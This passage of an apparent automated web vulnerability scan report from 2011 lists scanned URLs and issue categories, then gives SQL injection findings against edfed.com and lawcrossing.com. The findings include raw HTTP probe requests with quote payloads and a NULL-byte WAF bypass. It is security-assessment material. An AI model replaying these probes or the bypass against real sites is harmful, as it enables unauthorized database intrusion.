15.267. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/x5seriessavmediagallery.aspx

15.268. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx

15.269. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

15.270. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

15.271. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

15.272. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx

15.273. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

15.274. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

15.275. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

15.276. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

15.277. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

15.278. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

15.279. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx

15.280. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx

15.281. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx

15.282. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

15.283. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

15.284. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

15.285. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx

15.286. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

15.287. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

15.288. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

15.289. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20

15.290. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx

15.291. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

15.292. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

15.293. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

15.294. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

15.295. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

15.296. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

15.297. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

15.298. http://www.businessanalystcrossing.com/

15.299. http://www.businessdevelopmentcrossing.com/

15.300. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

15.301. http://www.callcentercrossing.com/

15.302. http://www.chefcrossing.com/

15.303. http://www.civilengineeringcrossing.com/

15.304. http://www.clevelcrossing.com/

15.305. http://www.clinicalresearchcrossing.com/

15.306. http://www.codylindley.com/

15.307. http://www.compliancecrossing.com/

15.308. http://www.computeraideddesigncrossing.com/

15.309. http://www.constructioncrossing.com/

15.310. http://www.consultingcrossing.com/

15.311. http://www.contractmanagementcrossing.com/

15.312. http://www.counselingcrossing.com/

15.313. http://www.cpluspluscrossing.com/

15.314. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

15.315. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

15.316. http://www.customerservicecrossing.com/

15.317. http://www.dbacrossing.com/

15.318. http://www.dentalcrossing.com/

15.319. http://www.designingcrossing.com/

15.320. http://www.directstartv.com/

15.321. http://www.diversitycrossing.com/

15.322. http://www.dotnetcrossing.com/

15.323. http://www.ecommercecrossing.com/

15.324. http://www.edfed.com/

15.325. http://www.editingcrossing.com/

15.326. http://www.educationcrossing.com/

15.327. http://www.employmentauthority.com/

15.328. http://www.employmentcrossing.com/

15.329. http://www.energycrossing.com/

15.330. http://www.engineeringcrossing.com/

15.331. http://www.entrylevelcrossing.com/

15.332. http://www.environmentalcrossing.com/

15.333. http://www.environmentalsafetyhealthcrossing.com/

15.334. http://www.ericmmartin.com/projects/simplemodal/

15.335. http://www.erpcrossing.com/

15.336. http://www.execcrossing.com/

15.337. http://www.facebook.com/BMWUSA

15.338. http://www.facebook.com/EmploymentXing

15.339. http://www.facebook.com/pages/JD2B/298408284363

15.340. http://www.facebook.com/piyush.v.bhatt

15.341. http://www.facebook.com/plugins/like.php

15.342. http://www.facebook.com/plugins/likebox.php

15.343. http://www.facebook.com/yahoonews

15.344. http://www.facilitiescrossing.com/

15.345. http://www.financialservicescrossing.com/

15.346. http://www.foodservicescrossing.com/

15.347. http://www.fundraisingcrossing.com/

15.348. http://www.giscrossing.com/

15.349. http://www.governmentcrossing.com/

15.350. http://www.graduateschoolloans.com/

15.351. http://www.healthcarecrossing.com/

15.352. http://www.helpdeskcrossing.com/

15.353. http://www.hospitalitycrossing.com/

15.354. http://www.hototc.com/

15.355. http://www.hound.com/

15.356. http://www.hrcrossing.com/

15.357. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html

15.358. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

15.359. http://www.huffingtonpost.com/2011/01/19/craziest-ways-to-pay-tuit_n_811038.html

15.360. http://www.hvaccrossing.com/

15.361. http://www.informationtechnologycrossing.com/

15.362. http://www.insurcrossing.com/

15.363. http://www.intellectualpropertycrossing.com/

15.364. http://www.internshipcrossing.com/

15.365. http://www.j2eecrossing.com/

15.366. http://www.journalismcrossing.com/

15.367. http://www.lawcrossing.com/

15.368. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

15.369. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

15.370. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

15.371. http://www.lawcrossing.com/lcjssearchresults.php

15.372. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

15.373. http://www.lawfirmstaff.com/

15.374. http://www.lawschoolloanreport.org/

15.375. http://www.lawschoolloans.com/

15.376. https://www.lawschoolloans.com/lslprivateloan_application.php

15.377. http://www.legalauthority.com/

15.378. http://www.legalauthority.com/signup.php

15.379. http://www.logisticscrossing.com/

15.380. http://www.managercrossing.com/

15.381. http://www.manufacturingcrossing.com/

15.382. http://www.marketingcrossing.com/

15.383. http://www.mediajobcrossing.com/

15.384. http://www.medicalschoolloans.com/

15.385. http://www.militarycrossing.com/

15.386. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

15.387. http://www.nursingcrossing.com/

15.388. http://www.occupationaltherapycrossing.com/

15.389. http://www.opensource.org/licenses/gpl-license.php

15.390. http://www.opensource.org/licenses/mit-license.php

15.391. http://www.operationscrossing.com/

15.392. http://www.parttimecrossing.com/

15.393. http://www.pharmaceuticalcrossing.com/

15.394. http://www.physicalsecuritycrossing.com/

15.395. http://www.physicaltherapycrossing.com/

15.396. http://www.planningcrossing.com/

15.397. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

15.398. http://www.postdoctoralfellowcrossing.com/

15.399. http://www.prcrossing.com/

15.400. http://www.preferredresumes.com/

15.401. http://www.procurementcrossing.com/

15.402. http://www.productmanagercrossing.com/

15.403. http://www.projectmanagementcrossing.com/

15.404. http://www.publicinterestcrossing.com/

15.405. http://www.publishingcrossing.com/

15.406. http://www.purchasingcrossing.com/

15.407. http://www.qaqccrossing.com/

15.408. http://www.radiocrossing.com/

15.409. http://www.realestateandlandcrossing.com/

15.410. http://www.recruitingcrossing.com/

15.411. http://www.researchingcrossing.com/

15.412. http://www.retailcrossing.com/

15.413. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114

15.414. http://www.sciencescrossing.com/

15.415. http://www.scientistcrossing.com/

15.416. http://www.sellingcrossing.com/

15.417. http://www.sourcewatch.org/index.php

15.418. http://www.sqlcrossing.com/

15.419. http://www.teenagercrossing.com/

15.420. http://www.telecomcrossing.com/

15.421. http://www.toyota.com/dealers/

15.422. http://www.toyota.com/ideas-for-good/

15.423. http://www.toyota.com/mobilepromo/

15.424. http://www.toyota.com/safety/

15.425. http://www.toyota.com/toyota-care/

15.426. http://www.tradingcrossing.com/

15.427. http://www.trainingcrossing.com/

15.428. http://www.transportationcrossing.com/

15.429. http://www.travelingcrossing.com/

15.430. http://www.truckingcrossing.com/

15.431. http://www.tvcrossing.com/

15.432. http://www.underwritingcrossing.com/

15.433. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

15.434. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

15.435. http://www.veterinarycrossing.com/

15.436. http://www.volunteercrossing.com/

15.437. http://www.woothemes.com/

15.438. http://www.workathomecrossing.com/

15.439. http://www.writingcrossing.com/

16. Directory listing

17. Email addresses disclosed

17.1. http://www.aharrisonbarnes.com/

17.2. http://www.aharrisonbarnes.com/contact-us/script/functions.js

17.3. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

17.4. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/

17.5. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

17.6. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/tabber.js

17.7. http://www.bcgsearch.com/searchresults.php

17.8. http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

17.9. http://www.bmwusa.com/JavaScript/s_code.js

17.10. https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

17.11. https://www.bmwusa.com/JavaScript/s_code.js

17.12. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

17.13. http://www.directstartv.com/

17.14. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html

17.15. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

17.16. http://www.intelliprice.com/intellipricedealer/start.htm

17.17. http://www.lawcrossing.com/

17.18. http://www.legalauthority.com/signup.php

17.19. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

17.20. http://www.opensource.org/licenses/gpl-license.php

17.21. http://www.opensource.org/licenses/mit-license.php

17.22. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

17.23. http://www.toyota.com/js/global/global.js

17.24. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/calendar.js

17.25. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/prototype.js

17.26. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

17.27. http://www.velaw.com/WorkArea/java/ektron.js

17.28. http://www.velaw.com/lawyers/DavidBlumental.aspx

17.29. http://www.velaw.com/lawyers/DavidDAlessandro.aspx

17.30. http://www.velaw.com/lawyers/JaneVris.aspx

17.31. http://www.velaw.com/offices/Dallas.aspx

17.32. http://www.velaw.com/offices/Houston.aspx

18. Private IP addresses disclosed

18.1. http://www.toyotafinancial.com/consumer/tfs.portal

18.2. https://www.toyotafinancial.com/consumer/tfs.portal

19. Robots.txt file

19.1. http://www.bilingualcrossing.com/

19.2. http://www.biotechcrossing.com/

19.3. http://www.bluecollarcrossing.com/

19.4. http://www.businessanalystcrossing.com/

19.5. http://www.businessdevelopmentcrossing.com/

19.6. http://www.callcentercrossing.com/

19.7. http://www.chefcrossing.com/

19.8. http://www.civilengineeringcrossing.com/

19.9. http://www.clevelcrossing.com/

19.10. http://www.clinicalresearchcrossing.com/

19.11. http://www.compliancecrossing.com/

19.12. http://www.computeraideddesigncrossing.com/

19.13. http://www.constructioncrossing.com/

19.14. http://www.consultingcrossing.com/

19.15. http://www.contractmanagementcrossing.com/

19.16. http://www.counselingcrossing.com/

19.17. http://www.cpluspluscrossing.com/

19.18. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

19.19. http://www.customerservicecrossing.com/

19.20. http://www.dbacrossing.com/

19.21. http://www.dentalcrossing.com/

19.22. http://www.designingcrossing.com/

19.23. http://www.diversitycrossing.com/

19.24. http://www.dotnetcrossing.com/

19.25. http://www.ecommercecrossing.com/

19.26. http://www.edfed.com/

19.27. http://www.editingcrossing.com/

19.28. http://www.educationcrossing.com/

19.29. http://www.employmentauthority.com/

19.30. http://www.employmentcrossing.com/

19.31. http://www.energycrossing.com/

19.32. http://www.engineeringcrossing.com/

19.33. http://www.entrylevelcrossing.com/

19.34. http://www.environmentalcrossing.com/

19.35. http://www.environmentalsafetyhealthcrossing.com/

19.36. http://www.erpcrossing.com/

19.37. http://www.execcrossing.com/

19.38. http://www.facilitiescrossing.com/

19.39. http://www.financialservicescrossing.com/

19.40. http://www.foodservicescrossing.com/

19.41. http://www.fundraisingcrossing.com/

19.42. http://www.giscrossing.com/

19.43. http://www.governmentcrossing.com/

19.44. http://www.graduateschoolloans.com/

19.45. http://www.healthcarecrossing.com/

19.46. http://www.helpdeskcrossing.com/

19.47. http://www.hospitalitycrossing.com/

19.48. http://www.hrcrossing.com/

19.49. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

19.50. http://www.hvaccrossing.com/

19.51. http://www.informationtechnologycrossing.com/

19.52. http://www.insurcrossing.com/

19.53. http://www.intellectualpropertycrossing.com/

19.54. http://www.internshipcrossing.com/

19.55. http://www.j2eecrossing.com/

19.56. http://www.journalismcrossing.com/

19.57. http://www.logisticscrossing.com/

19.58. http://www.managercrossing.com/

19.59. http://www.manufacturingcrossing.com/

19.60. http://www.marketingcrossing.com/

19.61. http://www.mediajobcrossing.com/

19.62. http://www.medicalschoolloans.com/

19.63. http://www.militarycrossing.com/

19.64. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

19.65. http://www.nursingcrossing.com/

19.66. http://www.nytimes.com/2011/01/18/books/18book.html

19.67. http://www.occupationaltherapycrossing.com/

19.68. http://www.operationscrossing.com/

19.69. http://www.parttimecrossing.com/

19.70. http://www.pharmaceuticalcrossing.com/

19.71. http://www.physicalsecuritycrossing.com/

19.72. http://www.physicaltherapycrossing.com/

19.73. http://www.planningcrossing.com/

19.74. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

19.75. http://www.postdoctoralfellowcrossing.com/

19.76. http://www.prcrossing.com/

19.77. http://www.procurementcrossing.com/

19.78. http://www.productmanagercrossing.com/

19.79. http://www.projectmanagementcrossing.com/

19.80. http://www.publicinterestcrossing.com/

19.81. http://www.publishingcrossing.com/

19.82. http://www.purchasingcrossing.com/

19.83. http://www.qaqccrossing.com/

19.84. http://www.radiocrossing.com/

19.85. http://www.realestateandlandcrossing.com/

19.86. http://www.recruitingcrossing.com/

19.87. http://www.researchingcrossing.com/

19.88. http://www.retailcrossing.com/

19.89. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114

19.90. http://www.sciencescrossing.com/

19.91. http://www.scientistcrossing.com/

19.92. http://www.sellingcrossing.com/

19.93. http://www.sqlcrossing.com/

19.94. http://www.teenagercrossing.com/

19.95. http://www.telecomcrossing.com/

19.96. http://www.tradingcrossing.com/

19.97. http://www.trainingcrossing.com/

19.98. http://www.transportationcrossing.com/

19.99. http://www.travelingcrossing.com/

19.100. http://www.truckingcrossing.com/

19.101. http://www.tvcrossing.com/

19.102. http://www.underwritingcrossing.com/

19.103. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

19.104. http://www.veterinarycrossing.com/

19.105. http://www.volunteercrossing.com/

19.106. http://www.workathomecrossing.com/

19.107. http://www.writingcrossing.com/

20. Cacheable HTTPS response

20.1. https://www.bmwusa.com/Secured/FrameCheck.aspx

20.2. https://www.lowermybills.com/lending/home-refinance/

20.3. https://www.toyotafinancial.com/consumer/tfs.portal

21. HTML does not specify charset

21.1. https://www.lowermybills.com/lending/home-refinance/

21.2. http://www.softcomplex.com/products/tigra_calendar_pro/

21.3. http://www.toyota.co.jp/en/index.html

21.4. http://www.toyota.com/download-brochure.html

21.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm

21.6. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

21.7. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

22. Content type incorrectly stated

22.1. http://www.100kcrossing.com/favicon.ico

22.2. http://www.aharrisonbarnes.com/wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php

22.3. http://www.aharrisonbarnes.com/wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php

22.4. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png

22.5. http://www.bcgsearch.com/favicon.ico

22.6. http://www.legalauthority.com/tmviewbanner.php

22.7. http://www.toyota.com/img/mobilepromo/mobileLogoBottom.gif

22.8. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/myGuideParameters.js

23. SSL certificate



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.edfed.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.edfed.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?1%00'=1 HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:58 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=j2smse82ucu5hpipl3grpjvjk4; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154420

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...
told me it would be! The monthly payment that they expected me to make was ridiculous! How could I, a recent grad, afford to make payments like that every month? I called to complain to them about the error on my account. They told me that the person th...<br>
...[SNIP]...

Request 2

GET /?1%00''=1 HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=l24gtaf6dhq2v58ea3g6mcl5b1; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154341

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...

1.2. http://www.lawcrossing.com/lcjssearchresults.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /lcjssearchresults.php' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=768gpl04fukvao3vkb03tcqct6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211210

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...
report, Hate Crime Statistics, that revealed a 25% increase of hate crimes against Latinos in just three short years. Interestingly (or maybe not), this coincided with the new and growing interest of illegal immigration from Mexico in the United States.
<br>
...[SNIP]...

Request 2

GET /lcjssearchresults.php'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:52 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukbkja300kfsovlq2ha0blbke4; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103002

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.3. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /salarysurvey/lcsalarysurvey.php' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:31:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hkesccpn53pmrddrmv4i22hhn0; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...

Request 2

GET /salarysurvey/lcsalarysurvey.php'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:31:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pl71ivi9iep0n3gtatr6dgnog5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103039

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.4. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /salarysurvey/lcsalarysurvey.php/1' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:30:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3019nb68albbrm8rj2qutsp212; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103077

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...

Request 2

GET /salarysurvey/lcsalarysurvey.php/1'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:30:18 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jieha937m8arnb548qci7an0j2; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103078

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
